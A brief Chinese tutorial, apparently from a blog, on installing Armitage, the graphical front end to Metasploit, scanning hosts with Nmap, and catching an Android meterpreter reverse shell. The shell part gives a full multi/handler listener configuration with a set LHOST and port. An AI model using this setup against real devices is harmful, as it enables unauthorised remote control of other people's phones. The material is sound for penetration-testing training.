Armitage是一款基于Java的Metasploit图形界面化的攻击软件，可以用它结合 Metasploit中已知的exploit来针对主机存在的漏洞自动化攻击。通过命令行的方式使用Metasploit难度较高，需要记忆的命令过多，而Armitage完美的解决了这一问题，用户只需要简单的点击菜单，就可以实现对目标主机的安全测试和攻击。Armitage良好的图形展示界面，使得攻击过程更加直观，用户体验更好。因其操作的简单性，尤其适合Metasploit初学者对目标系统进行安全测试和攻击。

Armitage安装

Armitage的安装很简单，我们只需要执行下面命令即可。

apt-get update
apt-get install -y armitage

运行Armitage

首先初始化msf数据库，执行命令

msfdb init

然后执行命令armitage启动程序。

登录后界面如下

主机扫描

依次点击Hosts->Nmap Scan这里扫描方式有多种，都是基于nmap完成扫描的。当然也可以利用msf进行扫描。

如上，我们扫描到了此设备，点击设备右键可选择针对此设备的攻击模块。

相关shell操作

这里我们以android shell为列
首先在kali中生成基于android的shell
然后配置终端

use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.50.123
set LPORT 443
exploit -j

运行shell后，成功获得权限

可视化的文件管理

总结

armitage将msf命令和结果通过图形化的形式展现出来。方便我们对文件的预览上传和下载。当然也有其缺点，必要msfdb数据库的配置就显得很鸡肋。